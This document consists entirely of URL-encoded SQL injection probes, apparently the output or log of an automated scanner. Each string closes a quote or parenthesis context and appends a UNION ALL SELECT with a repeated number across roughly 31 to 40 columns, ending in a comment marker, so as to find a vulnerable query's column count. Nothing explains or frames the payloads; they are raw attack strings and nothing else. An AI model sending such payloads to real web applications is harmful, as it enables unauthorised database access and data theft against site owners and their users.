-9016%22%20UNION%20ALL%20SELECT%205861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%2C5861%23 -1591%22%20UNION%20ALL%20SELECT%202925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%2C2925%23 -4258%29%20UNION%20ALL%20SELECT%206050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%2C6050%23 -6132%29%20UNION%20ALL%20SELECT%203154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%23 -5531%29%20UNION%20ALL%20SELECT%205697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%23 -6453%29%20UNION%20ALL%20SELECT%209587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%23 -3588%29%20UNION%20ALL%20SELECT%206676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%23 -1720%29%20UNION%20ALL%20SELECT%207379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%23 -5897%29%20UNION%20ALL%20SELECT%203898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%23 -6754%29%20UNION%20ALL%20SELECT%206561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%2C6561%23 -6836%29%20UNION%20ALL%20SELECT%205651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%23 -2132%29%20UNION%20ALL%20SELECT%205203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%2C5203%23 -4581%29%29%20UNION%20ALL%20SELECT%208661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%23 -4446%29%29%20UNION%20ALL%20SELECT%204185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%23 -1380%29%29%20UNION%20ALL%20SELECT%201987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%2C1987%23 -2792%29%29%20UNION%20ALL%20SELECT%201569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%23 -3411%29%29%20UNION%20ALL%20SELECT%208197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%2C8197%23 -3909%29%29%20UNION%20ALL%20SELECT%201535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%2C1535%23 -6853%29%29%20UNION%20ALL%20SELECT%209650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%23 -8540%29%29%20UNION%20ALL%20SELECT%201574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%23 -8103%29%29%20UNION%20ALL%20SELECT%202406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%2C2406%23 -8239%29%29%20UNION%20ALL%20SELECT%205158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%23 -3381%29%29%29%20UNION%20ALL%20SELECT%208724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%23 -7613%29%29%29%20UNION%20ALL%20SELECT%208055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%23 -4800%29%29%29%20UNION%20ALL%20SELECT%206210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%23 -3103%29%29%29%20UNION%20ALL%20SELECT%209636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%2C9636%23 -3188%29%29%29%20UNION%20ALL%20SELECT%207139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%2C7139%23 -1130%29%29%29%20UNION%20ALL%20SELECT%207772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%23 -8962%29%29%29%20UNION%20ALL%20SELECT%209847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%23 -8323%29%29%29%20UNION%20ALL%20SELECT%205651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%23 -6951%29%29%29%20UNION%20ALL%20SELECT%202541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%23 -4480%29%29%29%20UNION%20ALL%20SELECT%209377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%23 -1082%20UNION%20ALL%20SELECT%207402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%23 -6656%20UNION%20ALL%20SELECT%205363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%23 -8261%20UNION%20ALL%20SELECT%205131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%23 -7101%20UNION%20ALL%20SELECT%201854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%2C1854%23 -2923%20UNION%20ALL%20SELECT%204564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%2C4564%23 -6942%20UNION%20ALL%20SELECT%206755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%23 -4821%20UNION%20ALL%20SELECT%206313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%23 -4739%20UNION%20ALL%20SELECT%208059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%23 -5096%20UNION%20ALL%20SELECT%205218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%23 -9992%20UNION%20ALL%20SELECT%207826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%23 -8282%27%29%20UNION%20ALL%20SELECT%202014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%2C2014%23 -4399%27%29%20UNION%20ALL%20SELECT%203878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%23 -4533%27%29%20UNION%20ALL%20SELECT%207050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%23 -6391%27%29%20UNION%20ALL%20SELECT%205494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%2C5494%23 -8822%27%29%20UNION%20ALL%20SELECT%205427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%2C5427%23 -7379%27%29%20UNION%20ALL%20SELECT%202069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%23 -6037%27%29%20UNION%20ALL%20SELECT%204137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%23 -8130%27%29%20UNION%20ALL%20SELECT%202478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%23 -5024%27%29%20UNION%20ALL%20SELECT%203157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%23 -1468%27%29%20UNION%20ALL%20SELECT%207013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%23 -6977%27%29%29%20UNION%20ALL%20SELECT%207330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%2C7330%23 -5235%27%29%29%20UNION%20ALL%20SELECT%201550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%23 -7187%27%29%29%20UNION%20ALL%20SELECT%202820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%23 -9852%27%29%29%20UNION%20ALL%20SELECT%203060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%23 -2261%27%29%29%20UNION%20ALL%20SELECT%203631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%2C3631%23 -6680%27%29%29%20UNION%20ALL%20SELECT%204583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%23 -4306%27%29%29%20UNION%20ALL%20SELECT%207546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%2C7546%23 -7591%27%29%29%20UNION%20ALL%20SELECT%206497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%23 -5907%27%29%29%20UNION%20ALL%20SELECT%208748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%23 -4297%27%29%29%20UNION%20ALL%20SELECT%209341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%23 -3726%27%29%29%29%20UNION%20ALL%20SELECT%206771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%23 -4564%27%29%29%29%20UNION%20ALL%20SELECT%207799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%23 -6792%27%29%29%29%20UNION%20ALL%20SELECT%201819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%23 -8277%27%29%29%29%20UNION%20ALL%20SELECT%202966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%2C2966%23 -2701%27%29%29%29%20UNION%20ALL%20SELECT%205032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%2C5032%23 -3752%27%29%29%29%20UNION%20ALL%20SELECT%202889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%2C2889%23 -5058%27%29%29%29%20UNION%20ALL%20SELECT%208448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%23 -2800%27%29%29%29%20UNION%20ALL%20SELECT%202878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%23 -6866%27%29%29%29%20UNION%20ALL%20SELECT%201212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%23 -8084%27%29%29%29%20UNION%20ALL%20SELECT%204508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%23 -3809%27%20UNION%20ALL%20SELECT%204212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%23 -1642%27%20UNION%20ALL%20SELECT%206470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%2C6470%23 